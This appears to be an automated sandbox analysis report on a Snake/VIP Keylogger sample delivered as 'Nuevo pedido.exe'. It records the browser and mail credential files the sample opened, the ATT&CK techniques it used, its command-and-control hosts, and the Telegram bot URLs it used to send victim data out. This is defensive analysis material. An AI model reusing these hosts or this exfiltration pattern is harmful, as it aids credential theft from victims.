Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Nuevo pedido.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nuevo pedido.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nuevo pedido.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Nuevo pedido.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Nuevo pedido.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4135978280.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nuevo pedido.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nuevo pedido.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nuevo pedido.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	112 Process Injection	3 Obfuscated Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	2 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	11 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	112 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Nuevo pedido.exe	45%	ReversingLabs	ByteCode-MSIL.Spyware.Negasteal
Nuevo pedido.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	45%	ReversingLabs	ByteCode-MSIL.Spyware.Negasteal

Source	Detection	Scanner	Label
http://anotherarmy.dns.army:8081	100%	Avira URL Cloud	phishing
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	Avira URL Cloud	safe
http://51.38.247.67:8081/_send_.php?L	0%	Avira URL Cloud	safe
http://varders.kozow.com:8081	100%	Avira URL Cloud	malware
http://aborters.duckdns.org:8081	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.16.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:42:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:22:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E2000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000422F000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004386000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000043D3000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004257000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004513000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004321000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044C5000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.000000000436E000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004396000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.sajatypeworks.com	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a	QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000438C000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004232000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000042FC000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044CB000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004371000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ascendercorp.com/typedesigners.html	Nuevo pedido.exe, 00000000.00000002.1736143627.00000000058E0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fonts.com	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Nuevo pedido.exe, 00000000.00000002.1730142640.00000000028F9000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1776750263.0000000003119000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	Nuevo pedido.exe, 00000000.00000002.1736270644.0000000005920000.00000004.00000020.00020000.00000000.sdmp, Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003151000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003291000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/	Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp	false		high
